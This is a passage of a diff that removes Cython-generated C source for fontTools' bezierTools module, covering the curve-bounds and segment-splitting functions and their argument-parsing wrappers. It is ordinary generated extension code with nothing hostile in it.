"""Finds intersections between a curve and a line. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_pointFinder); - __Pyx_XDECREF(__pyx_v_intersections); - __Pyx_XDECREF(__pyx_v_t); - __Pyx_XDECREF(__pyx_v_pt); - __Pyx_XDECREF(__pyx_v_line_t); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_81_curve_bounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_80_curve_bounds, "_curve_bounds(c)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_81_curve_bounds = {"_curve_bounds", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_81_curve_bounds, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_80_curve_bounds}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_81_curve_bounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_c = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_curve_bounds (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_c,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1286, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_curve_bounds") < 0)) __PYX_ERR(0, 1286, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_c = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_curve_bounds", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1286, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_bounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_80_curve_bounds(__pyx_self, __pyx_v_c); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_80_curve_bounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_curve_bounds", 1); - - /* "fontTools/misc/bezierTools.py":1287 - * - * def _curve_bounds(c): - * if len(c) == 3: # <<<<<<<<<<<<<< - * return calcQuadraticBounds(*c) - * elif len(c) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1287, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1288 - * def _curve_bounds(c): - * if len(c) == 3: - * return calcQuadraticBounds(*c) # <<<<<<<<<<<<<< - * elif len(c) == 4: - * return calcCubicBounds(*c) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_calcQuadraticBounds); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1288, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1288, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_4, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1288, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1287 - * - * def _curve_bounds(c): - * if len(c) == 3: # <<<<<<<<<<<<<< - * return calcQuadraticBounds(*c) - * elif len(c) == 4: - */ - } - - /* "fontTools/misc/bezierTools.py":1289 - * if len(c) == 3: - * return calcQuadraticBounds(*c) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return calcCubicBounds(*c) - * raise ValueError("Unknown curve degree") - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1289, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1290 - * return calcQuadraticBounds(*c) - * elif len(c) == 4: - * return calcCubicBounds(*c) # <<<<<<<<<<<<<< - * raise ValueError("Unknown curve degree") - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_calcCubicBounds); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1290, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_4 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1290, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1290, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1289 - * if len(c) == 3: - * return calcQuadraticBounds(*c) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return calcCubicBounds(*c) - * raise ValueError("Unknown curve degree") - */ - } - - /* "fontTools/misc/bezierTools.py":1291 - * elif len(c) == 4: - * return calcCubicBounds(*c) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1291, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_Raise(__pyx_t_3, 0, 0, 0); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __PYX_ERR(0, 1291, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_bounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_83_split_segment_at_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_82_split_segment_at_t, "_split_segment_at_t(c, t)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_83_split_segment_at_t = {"_split_segment_at_t", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_83_split_segment_at_t, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_82_split_segment_at_t}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_83_split_segment_at_t(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_split_segment_at_t (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_c,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1294, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1294, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("_split_segment_at_t", 1, 2, 2, 1); __PYX_ERR(0, 1294, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_split_segment_at_t") < 0)) __PYX_ERR(0, 1294, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_c = values[0]; - __pyx_v_t = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("_split_segment_at_t", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1294, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools._split_segment_at_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_82_split_segment_at_t(__pyx_self, __pyx_v_c, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_82_split_segment_at_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c, PyObject *__pyx_v_t) { - PyObject *__pyx_v_s = NULL; - PyObject *__pyx_v_e = NULL; - PyObject *__pyx_v_midpoint = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *(*__pyx_t_6)(PyObject *); - int __pyx_t_7; - PyObject *__pyx_t_8 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("_split_segment_at_t", 1); - - /* "fontTools/misc/bezierTools.py":1295 - * - * def _split_segment_at_t(c, t): - * if len(c) == 2: # <<<<<<<<<<<<<< - * s, e = c - * midpoint = linePointAtT(s, e, t) - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1295, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 2); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1296 - * def _split_segment_at_t(c, t): - * if len(c) == 2: - * s, e = c # <<<<<<<<<<<<<< - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] - */ - if ((likely(PyTuple_CheckExact(__pyx_v_c))) || (PyList_CheckExact(__pyx_v_c))) { - PyObject* sequence = __pyx_v_c; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1296, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_3 = PyList_GET_ITEM(sequence, 0); - __pyx_t_4 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_4); - #else - __pyx_t_3 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1296, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1296, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_5 = PyObject_GetIter(__pyx_v_c); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1296, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_5); - index = 0; __pyx_t_3 = __pyx_t_6(__pyx_t_5); if (unlikely(!__pyx_t_3)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 1; __pyx_t_4 = __pyx_t_6(__pyx_t_5); if (unlikely(!__pyx_t_4)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(__pyx_t_4); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_6(__pyx_t_5), 2) < 0) __PYX_ERR(0, 1296, __pyx_L1_error) - __pyx_t_6 = NULL; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_6 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1296, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_v_s = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_e = __pyx_t_4; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1297 - * if len(c) == 2: - * s, e = c - * midpoint = linePointAtT(s, e, t) # <<<<<<<<<<<<<< - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_linePointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1297, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_5, __pyx_v_s, __pyx_v_e, __pyx_v_t}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_7, 3+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1297, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_midpoint = __pyx_t_4; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1298 - * s, e = c - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] # <<<<<<<<<<<<<< - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_4 = PyTuple_New(2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_INCREF(__pyx_v_s); - __Pyx_GIVEREF(__pyx_v_s); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_s)) __PYX_ERR(0, 1298, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_midpoint); - __Pyx_GIVEREF(__pyx_v_midpoint); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_v_midpoint)) __PYX_ERR(0, 1298, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_midpoint); - __Pyx_GIVEREF(__pyx_v_midpoint); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_midpoint)) __PYX_ERR(0, 1298, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_e); - __Pyx_GIVEREF(__pyx_v_e); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_e)) __PYX_ERR(0, 1298, __pyx_L1_error); - __pyx_t_5 = PyList_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 0, __pyx_t_4)) __PYX_ERR(0, 1298, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 1, __pyx_t_3)) __PYX_ERR(0, 1298, __pyx_L1_error); - __pyx_t_4 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1295 - * - * def _split_segment_at_t(c, t): - * if len(c) == 2: # <<<<<<<<<<<<<< - * s, e = c - * midpoint = linePointAtT(s, e, t) - */ - } - - /* "fontTools/misc/bezierTools.py":1299 - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: # <<<<<<<<<<<<<< - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1299, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1300 - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) # <<<<<<<<<<<<<< - * elif len(c) == 4: - * return splitCubicAtT(*c, t) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_splitQuadraticAtT_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_t)) __PYX_ERR(0, 1300, __pyx_L1_error); - __pyx_t_8 = PyNumber_Add(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_8, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1300, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_r = __pyx_t_4; - __pyx_t_4 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1299 - * midpoint = linePointAtT(s, e, t) - * return [(s, midpoint), (midpoint, e)] - * if len(c) == 3: # <<<<<<<<<<<<<< - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: - */ - } - - /* "fontTools/misc/bezierTools.py":1301 - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return splitCubicAtT(*c, t) - * raise ValueError("Unknown curve degree") - */ - __pyx_t_1 = PyObject_Length(__pyx_v_c); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1301, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1302 - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: - * return splitCubicAtT(*c, t) # <<<<<<<<<<<<<< - * raise ValueError("Unknown curve degree") - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_splitCubicAtT_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_8 = __Pyx_PySequence_Tuple(__pyx_v_c); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1302, __pyx_L1_error); - __pyx_t_3 = PyNumber_Add(__pyx_t_8, __pyx_t_5); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_4, __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1302, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1301 - * if len(c) == 3: - * return splitQuadraticAtT(*c, t) - * elif len(c) == 4: # <<<<<<<<<<<<<< - * return splitCubicAtT(*c, t) - * raise ValueError("Unknown curve degree") - */ - } - - /* "fontTools/misc/bezierTools.py":1303 - * elif len(c) == 4: - * return splitCubicAtT(*c, t) - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1303, __pyx_L1_error) - 